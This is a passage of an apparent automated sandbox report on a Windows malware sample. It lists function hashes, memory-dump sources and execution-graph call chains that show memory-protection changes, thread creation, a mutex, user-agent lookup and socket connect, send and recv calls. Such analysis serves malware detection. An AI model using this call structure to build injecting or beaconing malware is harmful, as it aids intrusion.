                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 885266447-871070163
                                                                                • Opcode ID: 7b86c822cbb0e69a2f6818cd3f510ab08ce56b5a5b1a6d32f3d8711a827686f4
                                                                                • Instruction ID: cb1b6fc7e38465670291edf029cc9b26bb7b5b1358641e454a77219d92c1c855
                                                                                • Opcode Fuzzy Hash: 7b86c822cbb0e69a2f6818cd3f510ab08ce56b5a5b1a6d32f3d8711a827686f4
                                                                                • Instruction Fuzzy Hash: AF512671700705ABDB14EF68DC81FA6739CEF98760F114229FD18DB282EA65ED418BA0
                                                                                Function 0094EC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0098248D
                                                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009824BD
                                                                                • RTL: Re-Waiting, xrefs: 009824FA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                • API String ID: 0-3177188983
                                                                                • Opcode ID: 8c252a7dda93bd9a08a4a9c622d97e07ea575dca98d69b2811a4c78a14cac4bc
                                                                                • Instruction ID: 44322ae05614d4fd9bebf3a06761487f6e22c3b10c33214cd0145c5950818505
                                                                                • Opcode Fuzzy Hash: 8c252a7dda93bd9a08a4a9c622d97e07ea575dca98d69b2811a4c78a14cac4bc
                                                                                • Instruction Fuzzy Hash: A341E671A00208ABDB20EF68DC85FAA77A9FF85720F208A15F555DB3D1D774E9418B70
                                                                                Function 0095FCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: __fassign
                                                                                • String ID:
                                                                                • API String ID: 3965848254-0
                                                                                • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                • Instruction ID: a209587c6f32b58790b749c95f26f687f849347c4e5ff0f73c8e343d0b7762c6
                                                                                • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                • Instruction Fuzzy Hash: 7091A331D00209EFDF24DF59C8567AEB7B8EF55326F20847AD841A7292E7305A4DCB91
                                                                                Function 009D5CFA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: __aulldvrm
                                                                                • String ID: $$0
                                                                                • API String ID: 1302938615-389342756
                                                                                • Opcode ID: 2d2e4c77931c21892e8505deade4a7df631c5b2a8b6e15068200df365688448a
                                                                                • Instruction ID: 72493298067819e14af42f8751c7c1b80473ac2a3e967ce9bb616366d7fffa40
                                                                                • Opcode Fuzzy Hash: 2d2e4c77931c21892e8505deade4a7df631c5b2a8b6e15068200df365688448a
                                                                                • Instruction Fuzzy Hash: 4F91BF30D84A8AAFDF24DFA9C4453EEBBB5AF45310F16865BD4A1AB3D1C3744A41CB60

                                                                                Execution Graph

                                                                                Execution Coverage:2.4%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:6.3%
                                                                                Total number of Nodes:477
                                                                                Total number of Limit Nodes:19
                                                                                execution_graph 13771 8d5ccd4 13773 8d5ccd8 13771->13773 13772 8d5d022 13773->13772 13777 8d5c352 13773->13777 13775 8d5cf0d 13775->13772 13786 8d5c792 13775->13786 13779 8d5c39e 13777->13779 13778 8d5c58e 13778->13775 13779->13778 13780 8d5c4ec 13779->13780 13782 8d5c595 13779->13782 13781 8d62232 NtCreateFile 13780->13781 13784 8d5c4ff 13781->13784 13782->13778 13783 8d62232 NtCreateFile 13782->13783 13783->13778 13784->13778 13785 8d62232 NtCreateFile 13784->13785 13785->13778 13787 8d5c7e0 13786->13787 13788 8d62232 NtCreateFile 13787->13788 13790 8d5c90c 13788->13790 13789 8d5caf3 13789->13775 13790->13789 13791 8d5c352 NtCreateFile 13790->13791 13792 8d5c602 NtCreateFile 13790->13792 13791->13790 13792->13790 13487 8d63e12 13491 8d62942 13487->13491 13489 8d63e45 NtProtectVirtualMemory 13490 8d63e70 13489->13490 13492 8d62967 13491->13492 13492->13489 13882 8d58613 13884 8d58620 13882->13884 13883 8d58684 13884->13883 13885 8d63e12 NtProtectVirtualMemory 13884->13885 13885->13884 13533 8d572dd 13534 8d5731a 13533->13534 13535 8d573fa 13534->13535 13536 8d57328 SleepEx 13534->13536 13540 8d61f12 13534->13540 13549 8d58432 13534->13549 13559 8d570f2 13534->13559 13536->13534 13536->13536 13542 8d61f48 13540->13542 13541 8d62134 13541->13534 13542->13541 13543 8d620e9 13542->13543 13548 8d62232 NtCreateFile 13542->13548 13565 8d62f82 13542->13565 13544 8d62125 13543->13544 13582 8d61842 13543->13582 13590 8d61922 13544->13590 13548->13542 13550 8d5845b 13549->13550 13558 8d584c9 13549->13558 13551 8d62232 NtCreateFile 13550->13551 13550->13558 13552 8d58496 13551->13552 13553 8d584c5 13552->13553 13602 8d58082 13552->13602 13555 8d62232 NtCreateFile 13553->13555 13553->13558 13555->13558 13556 8d584b6 13556->13553 13611 8d57f52 13556->13611 13558->13534 13560 8d571d3 13559->13560 13561 8d57109 13559->13561 13560->13534 13616 8d57012 13561->13616 13563 8d57113 13563->13560 13564 8d62f82 7 API calls 13563->13564 13564->13560 13567 8d62fb8 13565->13567 13566 8d63022 13566->13542 13567->13566 13568 8d5f5b2 socket 13567->13568 13570 8d63081 13567->13570 13568->13570 13569 8d63134 13569->13566 13571 8d5f732 connect 13569->13571 13573 8d631b2 13569->13573 13570->13566 13570->13569 13572 8d63117 getaddrinfo 13570->13572 13571->13573 13572->13569 13574 8d636b5 13573->13574 13575 8d636ff 13573->13575 13577 8d5f7b2 closesocket 13574->13577 13576 8d5f6b2 send 13575->13576 13580 8d63729 13576->13580 13577->13566 13578 8d5f7b2 closesocket 13578->13566 13579 8d637f4 setsockopt recv 13581 8d63863 13579->13581 13580->13579 13580->13581 13581->13578 13583 8d6186d 13582->13583 13598 8d62232 13583->13598 13585 8d61906 13585->13543 13586 8d61888 13586->13585 13587 8d62f82 7 API calls 13586->13587 13588 8d618c5 13586->13588 13587->13588 13588->13585 13589 8d62232 NtCreateFile 13588->13589 13589->13585 13591 8d619c2 13590->13591 13592 8d62232 NtCreateFile 13591->13592 13595 8d619d6 13592->13595 13593 8d61a9f 13593->13541 13594 8d61a5d 13594->13593 13596 8d62232 NtCreateFile 13594->13596 13595->13593 13595->13594 13597 8d62f82 7 API calls 13595->13597 13596->13593 13597->13594 13599 8d6225c 13598->13599 13601 8d62334 13598->13601 13600 8d62410 NtCreateFile 13599->13600 13599->13601 13600->13601 13601->13586 13603 8d58420 13602->13603 13604 8d580aa 13602->13604 13603->13556 13604->13603 13605 8d62232 NtCreateFile 13604->13605 13607 8d581f9 13605->13607 13606 8d583df 13606->13556 13607->13606 13608 8d62232 NtCreateFile 13607->13608 13609 8d583c9 13608->13609 13610 8d62232 NtCreateFile 13609->13610 13610->13606 13612 8d57f70 13611->13612 13613 8d57f84 13611->13613 13612->13553 13614 8d62232 NtCreateFile 13613->13614 13615 8d58046 13614->13615 13615->13553 13618 8d57031 13616->13618 13617 8d570cd 13617->13563 13618->13617 13619 8d62f82 7 API calls 13618->13619 13619->13617 13793 8d5aedd 13795 8d5af06 13793->13795 13794 8d5afa4 13795->13794 13796 8d578f2 NtProtectVirtualMemory 13795->13796 13797 8d5af9c 13796->13797 13798 8d5e382 2 API calls 13797->13798 13798->13794 13886 8d64a1f 13887 8d64a25 13886->13887 13890 8d585f2 13887->13890 13889 8d64a3d 13891 8d5860e 13890->13891 13892 8d585fb 13890->13892 13891->13889 13892->13891 13893 8d5d662 7 API calls 13892->13893 13893->13891 13921 8d5add9 13922 8d5adf0 13921->13922 13923 8d5e382 2 API calls 13922->13923 13924 8d5aecd 13922->13924 13923->13924 13497 8d62f82 13499 8d62fb8 13497->13499 13498 8d63022 13499->13498 13502 8d63081 13499->13502 13514 8d5f5b2 13499->13514 13501 8d63134 13501->13498 13505 8d631b2 13501->13505 13517 8d5f732 13501->13517 13502->13498 13502->13501 13504 8d63117 getaddrinfo 13502->13504 13504->13501 13506 8d636b5 13505->13506 13507 8d636ff 13505->13507 13523 8d5f7b2 13506->13523 13520 8d5f6b2 13507->13520 13510 8d5f7b2 closesocket 13510->13498 13511 8d637f4 setsockopt recv 13513 8d63863 13511->13513 13512 8d63729 13512->13511 13512->13513 13513->13510 13515 8d5f5ec 13514->13515 13516 8d5f60a socket 13514->13516 13515->13516 13516->13502 13518 8d5f788 connect 13517->13518 13519 8d5f76a 13517->13519 13518->13505 13519->13518 13521 8d5f705 send 13520->13521 13522 8d5f6e7 13520->13522 13521->13512 13522->13521 13524 8d5f804 closesocket 13523->13524 13525 8d5f7e4 13523->13525 13524->13498 13525->13524 13863 8d64a4d 13864 8d64a53 13863->13864 13867 8d58782 13864->13867 13866 8d64a6b 13869 8d5878f 13867->13869 13868 8d587ad 13868->13866 13869->13868 13871 8d5d662 13869->13871 13872 8d5d66b 13871->13872 13880 8d5d7ba 13871->13880 13873 8d570f2 7 API calls 13872->13873 13872->13880 13875 8d5d6ee 13873->13875 13874 8d5d750 13877 8d5d83f 13874->13877 13879 8d5d791 13874->13879 13874->13880 13875->13874 13876 8d62f82 7 API calls 13875->13876 13876->13874 13878 8d62f82 7 API calls 13877->13878 13877->13880 13878->13880 13879->13880 13881 8d62f82 7 API calls 13879->13881 13880->13868 13881->13880 13894 8d63e0a 13895 8d63e45 NtProtectVirtualMemory 13894->13895 13896 8d62942 13894->13896 13897 8d63e70 13895->13897 13896->13895 13969 8d5c14a 13970 8d5c153 13969->13970 13975 8d5c174 13969->13975 13972 8d5e382 2 API calls 13970->13972 13971 8d5c1e7 13973 8d5c16c 13972->13973 13974 8d570f2 7 API calls 13973->13974 13974->13975 13975->13971 13977 8d571f2 13975->13977 13978 8d5720f 13977->13978 13981 8d572c9 13977->13981 13979 8d61f12 8 API calls 13978->13979 13980 8d57242 13978->13980 13979->13980 13982 8d58432 NtCreateFile 13980->13982 13984 8d57289 13980->13984 13981->13975 13982->13984 13983 8d570f2 7 API calls 13983->13981 13984->13981 13984->13983 13799 8d5b2f4 13800 8d5b349 13799->13800 13801 8d5b49f 13800->13801 13803 8d578f2 NtProtectVirtualMemory 13800->13803 13802 8d578f2 NtProtectVirtualMemory 13801->13802 13806 8d5b4c3 13801->13806 13802->13806 13804 8d5b480 13803->13804 13805 8d578f2 NtProtectVirtualMemory 13804->13805 13805->13801 13807 8d578f2 NtProtectVirtualMemory 13806->13807 13808 8d5b597 13806->13808 13807->13808 13809 8d578f2 NtProtectVirtualMemory 13808->13809 13810 8d5b5bf 13808->13810 13809->13810 13814 8d578f2 NtProtectVirtualMemory 13810->13814 13815 8d5b6b9 13810->13815 13811 8d5b6e1 13812 8d5e382 2 API calls 13811->13812 13813 8d5b6e9 13812->13813 13814->13815 13815->13811 13816 8d578f2 NtProtectVirtualMemory 13815->13816 13816->13811 13493 8d62232 13494 8d6225c 13493->13494 13496 8d62334 13493->13496 13495 8d62410 NtCreateFile 13494->13495 13494->13496 13495->13496 13817 8d570f1 13818 8d571d3 13817->13818 13819 8d57109 13817->13819 13820 8d57012 7 API calls 13819->13820 13821 8d57113 13820->13821 13821->13818 13822 8d62f82 7 API calls 13821->13822 13822->13818 13925 8d585f1 13926 8d58606 13925->13926 13927 8d5860e 13925->13927 13928 8d5d662 7 API calls 13926->13928 13928->13927 13941 8d649b3 13942 8d649bd 13941->13942 13945 8d596d2 13942->13945 13944 8d649e0 13946 8d59704 13945->13946 13947 8d596f7 13945->13947 13949 8d596ff 13946->13949 13950 8d5972d 13946->13950 13952 8d59737 13946->13952 13948 8d570f2 7 API calls 13947->13948 13948->13949 13949->13944 13954 8d5f2c2 13950->13954 13952->13949 13953 8d62f82 7 API calls 13952->13953 13953->13949 13955 8d5f2df 13954->13955 13956 8d5f2cb 13954->13956 13955->13949 13956->13955 13957 8d5f0c2 7 API calls 13956->13957 13957->13955 13929 8d649f1 13930 8d649f7 13929->13930 13933 8d59852 13930->13933 13932 8d64a0f 13934 8d59865 13933->13934 13935 8d598e4 13933->13935 13934->13935 13937 8d59887 13934->13937 13939 8d5987e 13934->13939 13935->13932 13936 8d5f36f 13936->13932 13937->13935 13938 8d5d662 7 API calls 13937->13938 13938->13935 13939->13936 13940 8d5f0c2 7 API calls 13939->13940 13940->13936 13958 8d5afbf 13960 8d5b016 13958->13960 13959 8d5b0f0 13960->13959 13963 8d578f2 NtProtectVirtualMemory 13960->13963 13964 8d5b0bb 13960->13964 13961 8d5b0e8 13962 8d5e382 2 API calls 13961->13962 13962->13959 13963->13964 13964->13961 13965 8d578f2 NtProtectVirtualMemory 13964->13965 13965->13961 13847 8d5d8be 13848 8d5d8c3 13847->13848 13849 8d5d9a6 13848->13849 13850 8d5d995 ObtainUserAgentString 13848->13850 13850->13849 13985 8d5e37e 13986 8d5e3c7 13985->13986 13987 8d5e232 ObtainUserAgentString 13986->13987 13988 8d5e438 13987->13988 13989 8d5f632 WSAStartup 13988->13989 13990 8d5ee7b 13989->13990 13851 8d5f0b9 13852 8d5f1f0 13851->13852 13853 8d5f0ed 13851->13853 13853->13852 13854 8d62f82 7 API calls 13853->13854 13854->13852 13898 8d6183a 13899 8d61841 13898->13899 13900 8d62f82 7 API calls 13899->13900 13902 8d618c5 13900->13902 13901 8d61906 13902->13901 13903 8d62232 NtCreateFile 13902->13903 13903->13901 13991 8d62f7a 13993 8d62fb8 13991->13993 13992 8d63022 13993->13992 13994 8d5f5b2 socket 13993->13994 13996 8d63081 13993->13996 13994->13996 13995 8d63134 13995->13992 13997 8d5f732 connect 13995->13997 13999 8d631b2 13995->13999 13996->13992 13996->13995 13998 8d63117 getaddrinfo 13996->13998 13997->13999 13998->13995 14000 8d636b5 13999->14000 14001 8d636ff 13999->14001 14003 8d5f7b2 closesocket 14000->14003 14002 8d5f6b2 send 14001->14002 14006 8d63729 14002->14006 14003->13992 14004 8d5f7b2 closesocket 14004->13992 14005 8d637f4 setsockopt recv 14007 8d63863 14005->14007 14006->14005 14006->14007 14007->14004 13823 8d5b0fb 13825 8d5b137 13823->13825 13824 8d5b2d5 13825->13824 13826 8d578f2 NtProtectVirtualMemory 13825->13826 13827 8d5b28a 13826->13827 13828 8d578f2 NtProtectVirtualMemory 13827->13828 13831 8d5b2a9 13828->13831 13829 8d5b2cd 13830 8d5e382 2 API calls 13829->13830 13830->13824 13831->13829 13832 8d578f2 NtProtectVirtualMemory 13831->13832 13832->13829 13833 8d5f2e4 13834 8d5f36f 13833->13834 13835 8d5f305 13833->13835 13835->13834 13837 8d5f0c2 13835->13837 13838 8d5f1f0 13837->13838 13839 8d5f0cb 13837->13839 13838->13834 13839->13838 13840 8d62f82 7 API calls 13839->13840 13840->13838 14008 8d59b66 14010 8d59b6a 14008->14010 14009 8d59cce 14010->14009 14011 8d59cb5 CreateMutexW 14010->14011 14011->14009 13841 8d5cce2 13842 8d5cdd9 13841->13842 13843 8d5d022 13842->13843 13844 8d5c352 NtCreateFile 13842->13844 13845 8d5cf0d 13844->13845 13845->13843 13846 8d5c792 NtCreateFile 13845->13846 13846->13845 13966 8d5f7ad 13967 8d5f7a9 13966->13967 13967->13966 13968 8d5f804 closesocket 13967->13968 13904 8d5f62c 13905 8d5f68b WSAStartup 13904->13905 13906 8d5f66d 13904->13906 13906->13905 13620 8d63bac 13621 8d63bb1 13620->13621 13654 8d63bb6 13621->13654 13655 8d59b72 13621->13655 13623 8d63c2c 13624 8d63c85 13623->13624 13626 8d63c54 13623->13626 13627 8d63c69 13623->13627 13623->13654 13625 8d61ab2 NtProtectVirtualMemory 13624->13625 13628 8d63c8d 13625->13628 13629 8d61ab2 NtProtectVirtualMemory 13626->13629 13630 8d63c80 13627->13630 13631 8d63c6e 13627->13631 13691 8d5b102 13628->13691 13634 8d63c5c 13629->13634 13630->13624 13632 8d63c97 13630->13632 13635 8d61ab2 NtProtectVirtualMemory 13631->13635 13636 8d63cbe 13632->13636 13637 8d63c9c 13632->13637 13677 8d5aee2 13634->13677 13639 8d63c76 13635->13639 13641 8d63cc7 13636->13641 13642 8d63cd9 13636->13642 13636->13654 13659 8d61ab2 13637->13659 13683 8d5afc2 13639->13683 13643 8d61ab2 NtProtectVirtualMemory 13641->13643 13646 8d61ab2 NtProtectVirtualMemory 13642->13646 13642->13654 13645 8d63ccf 13643->13645 13701 8d5b2f2 13645->13701 13649 8d63ce5 13646->13649 13719 8d5b712 13649->13719 13657 8d59b93 13655->13657 13656 8d59cce 13656->13623 13657->13656 13658 8d59cb5 CreateMutexW 13657->13658 13658->13656 13661 8d61adf 13659->13661 13660 8d61ebc 13669 8d5ade2 13660->13669 13661->13660 13731 8d578f2 13661->13731 13663 8d61e5c 13664 8d578f2 NtProtectVirtualMemory 13663->13664 13665 8d61e7c 13664->13665 13666 8d578f2 NtProtectVirtualMemory 13665->13666 13667 8d61e9c 13666->13667 13668 8d578f2 NtProtectVirtualMemory 13667->13668 13668->13660 13670 8d5adf0 13669->13670 13672 8d5aecd 13670->13672 13754 8d5e382 13670->13754 13673 8d57412 13672->13673 13675 8d57440 13673->13675 13674 8d57473 13674->13654 13675->13674 13676 8d5744d CreateThread 13675->13676 13676->13654 13679 8d5af06 13677->13679 13678 8d5afa4 13678->13654 13679->13678 13680 8d578f2 NtProtectVirtualMemory 13679->13680 13681 8d5af9c 13680->13681 13682 8d5e382 2 API calls 13681->13682 13682->13678 13685 8d5b016 13683->13685 13684 8d5b0f0 13684->13654 13685->13684 13688 8d578f2 NtProtectVirtualMemory 13685->13688 13689 8d5b0bb 13685->13689 13686 8d5b0e8 13687 8d5e382 2 API calls 13686->13687 13687->13684 13688->13689 13689->13686 13690 8d578f2 NtProtectVirtualMemory 13689->13690 13690->13686 13693 8d5b137 13691->13693 13692 8d5b2d5 13692->13654 13693->13692 13694 8d578f2 NtProtectVirtualMemory 13693->13694 13695 8d5b28a 13694->13695 13696 8d578f2 NtProtectVirtualMemory 13695->13696 13699 8d5b2a9 13696->13699 13697 8d5b2cd 13698 8d5e382 2 API calls 13697->13698 13698->13692 13699->13697 13700 8d578f2 NtProtectVirtualMemory 13699->13700 13700->13697 13702 8d5b349 13701->13702 13703 8d5b49f 13702->13703 13705 8d578f2 NtProtectVirtualMemory 13702->13705 13704 8d578f2 NtProtectVirtualMemory 13703->13704 13708 8d5b4c3 13703->13708 13704->13708 13706 8d5b480 13705->13706 13707 8d578f2 NtProtectVirtualMemory 13706->13707 13707->13703 13709 8d578f2 NtProtectVirtualMemory 13708->13709 13710 8d5b597 13708->13710 13709->13710 13711 8d578f2 NtProtectVirtualMemory 13710->13711 13712 8d5b5bf 13710->13712 13711->13712 13716 8d578f2 NtProtectVirtualMemory 13712->13716 13717 8d5b6b9 13712->13717 13713 8d5b6e1 13714 8d5e382 2 API calls 13713->13714 13715 8d5b6e9 13714->13715 13715->13654 13716->13717 13717->13713 13718 8d578f2 NtProtectVirtualMemory 13717->13718 13718->13713 13720 8d5b767 13719->13720 13721 8d578f2 NtProtectVirtualMemory 13720->13721 13725 8d5b903 13720->13725 13722 8d5b8e3 13721->13722 13723 8d578f2 NtProtectVirtualMemory 13722->13723 13723->13725 13724 8d5b9b7 13727 8d5e382 2 API calls 13724->13727 13726 8d5b992 13725->13726 13728 8d578f2 NtProtectVirtualMemory 13725->13728 13726->13724 13730 8d578f2 NtProtectVirtualMemory 13726->13730 13729 8d5b9bf 13727->13729 13728->13726 13729->13654 13730->13724 13732 8d57987 13731->13732 13735 8d579b2 13732->13735 13746 8d58622 13732->13746 13734 8d57c0c 13734->13663 13735->13734 13736 8d57ba2 13735->13736 13739 8d57ac5 13735->13739 13737 8d63e12 NtProtectVirtualMemory 13736->13737 13738 8d57b5b 13737->13738 13738->13734 13741 8d63e12 NtProtectVirtualMemory 13738->13741 13750 8d63e12 13739->13750 13741->13734 13742 8d57ae3 13742->13734 13743 8d57b3d 13742->13743 13744 8d63e12 NtProtectVirtualMemory 13742->13744 13745 8d63e12 NtProtectVirtualMemory 13743->13745 13744->13743 13745->13738 13748 8d5867a 13746->13748 13747 8d58684 13747->13735 13748->13747 13749 8d63e12 NtProtectVirtualMemory 13748->13749 13749->13748 13751 8d62942 13750->13751 13752 8d63e45 NtProtectVirtualMemory 13751->13752 13753 8d63e70 13752->13753 13753->13742 13755 8d5e3c7 13754->13755 13760 8d5e232 13755->13760 13757 8d5e438 13764 8d5f632 13757->13764 13759 8d5ee7b 13759->13672 13761 8d5e25e 13760->13761 13767 8d5d8c2 13761->13767 13763 8d5e26b 13763->13757 13765 8d5f66d 13764->13765 13766 8d5f68b WSAStartup 13764->13766 13765->13766 13766->13759 13768 8d5d934 13767->13768 13769 8d5d9a6 13768->13769 13770 8d5d995 ObtainUserAgentString 13768->13770 13769->13763 13770->13769 13907 8d5842e 13908 8d5845b 13907->13908 13916 8d584c9 13907->13916 13909 8d62232 NtCreateFile 13908->13909 13908->13916 13910 8d58496 13909->13910 13911 8d584c5 13910->13911 13912 8d58082 NtCreateFile 13910->13912 13913 8d62232 NtCreateFile 13911->13913 13911->13916 13914 8d584b6 13912->13914 13913->13916 13914->13911 13915 8d57f52 NtCreateFile 13914->13915 13915->13911 14012 8d5f72e 14013 8d5f788 connect 14012->14013 14014 8d5f76a 14012->14014 14014->14013 13855 8d64aa9 13856 8d64aaf 13855->13856 13859 8d5f212 13856->13859 13858 8d64ac7 13860 8d5f237 13859->13860 13861 8d5f21b 13859->13861 13860->13858 13861->13860 13862 8d5f0c2 7 API calls 13861->13862 13862->13860 13917 8d5e22a 13918 8d5e25e 13917->13918 13919 8d5d8c2 ObtainUserAgentString 13918->13919 13920 8d5e26b 13919->13920

                                                                                Executed Functions

                                                                                Function 08D62F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 8d62f82-8d62fb6 1 8d62fd6-8d62fd9 0->1 2 8d62fb8-8d62fbc 0->2 4 8d638fe-8d6390c 1->4 5 8d62fdf-8d62fed 1->5 2->1 3 8d62fbe-8d62fc2 2->3 3->1 6 8d62fc4-8d62fc8 3->6 7 8d638f6-8d638f7 5->7 8 8d62ff3-8d62ff7 5->8 6->1 9 8d62fca-8d62fce 6->9 7->4 10 8d62fff-8d63000 8->10 11 8d62ff9-8d62ffd 8->11 9->1 12 8d62fd0-8d62fd4 9->12 13 8d6300a-8d63010 10->13 11->10 11->13 12->1 12->5 14 8d63012-8d63020 13->14 15 8d6303a-8d63060 13->15 14->15 18 8d63022-8d63026 14->18 16 8d63062-8d63066 15->16 17 8d63068-8d6307c call 8d5f5b2 15->17 16->17 20 8d630a8-8d630ab 16->20 22 8d63081-8d630a2 17->22 18->7 19 8d6302c-8d63035 18->19 19->7 23 8d63144-8d63150 20->23 24 8d630b1-8d630b8 20->24 22->20 26 8d638ee-8d638ef 22->26 25 8d63156-8d63165 23->25 23->26 27 8d630e2-8d630f5 24->27 28 8d630ba-8d630dc call 8d62942 24->28 29 8d63167-8d63178 call 8d5f552 25->29 30 8d6317f-8d6318f 25->30 26->7 27->26 32 8d630fb-8d63101 27->32 28->27 29->30 34 8d631e5-8d6321b 30->34 35 8d63191-8d631ad call 8d5f732 30->35 32->26 37 8d63107-8d63109 32->37 40 8d6322d-8d63231 34->40 41 8d6321d-8d6322b 34->41 43 8d631b2-8d631da 35->43 37->26 42 8d6310f-8d63111 37->42 45 8d63247-8d6324b 40->45 46 8d63233-8d63245 40->46 44 8d6327f-8d63280 41->44 42->26 47 8d63117-8d63132 getaddrinfo 42->47 43->34 52 8d631dc-8d631e1 43->52 51 8d63283-8d632e0 call 8d63d62 call 8d60482 call 8d5fe72 call 8d64002 44->51 48 8d63261-8d63265 45->48 49 8d6324d-8d6325f 45->49 46->44 47->23 50 8d63134-8d6313c 47->50 53 8d63267-8d6326b 48->53 54 8d6326d-8d63279 48->54 49->44 50->23 63 8d632f4-8d63354 call 8d63d92 51->63 64 8d632e2-8d632e6 51->64 52->34 53->51 53->54 54->44 69 8d6348c-8d634b8 call 8d63d62 call 8d64262 63->69 70 8d6335a-8d63396 call 8d63d62 call 8d64262 call 8d64002 63->70 64->63 66 8d632e8-8d632ef call 8d60042 64->66 66->63 79 8d634ba-8d634d5 69->79 80 8d634d9-8d63590 call 8d64262 * 3 call 8d64002 * 2 call 8d60482 69->80 85 8d633bb-8d633e9 call 8d64262 * 2 70->85 86 8d63398-8d633b7 call 8d64262 call 8d64002 70->86 79->80 111 8d63595-8d635b9 call 8d64262 80->111 101 8d63415-8d6341d 85->101 102 8d633eb-8d63410 call 8d64002 call 8d64262 85->102 86->85 105 8d63442-8d63448 101->105 106 8d6341f-8d63425 101->106 102->101 105->111 112 8d6344e-8d63456 105->112 109 8d63467-8d63487 call 8d64262 106->109 110 8d63427-8d6343d 106->110 109->111 110->111 121 8d635d1-8d636ad call 8d64262 * 7 call 8d64002 call 8d63d62 call 8d64002 call 8d5fe72 call 8d60042 111->121 122 8d635bb-8d635cc call 8d64262 call 8d64002 111->122 112->111 117 8d6345c-8d6345d 112->117 117->109 132 8d636af-8d636b3 121->132 122->132 135 8d636b5-8d636fa call 8d5f382 call 8d5f7b2 132->135 136 8d636ff-8d6372d call 8d5f6b2 132->136 158 8d638e6-8d638e7 135->158 143 8d6372f-8d63735 136->143 144 8d6375d-8d63761 136->144 143->144 147 8d63737-8d6374c 143->147 148 8d63767-8d6376b 144->148 149 8d6390d-8d63913 144->149 147->144 152 8d6374e-8d63754 147->152 155 8d63771-8d63773 148->155 156 8d638aa-8d638df call 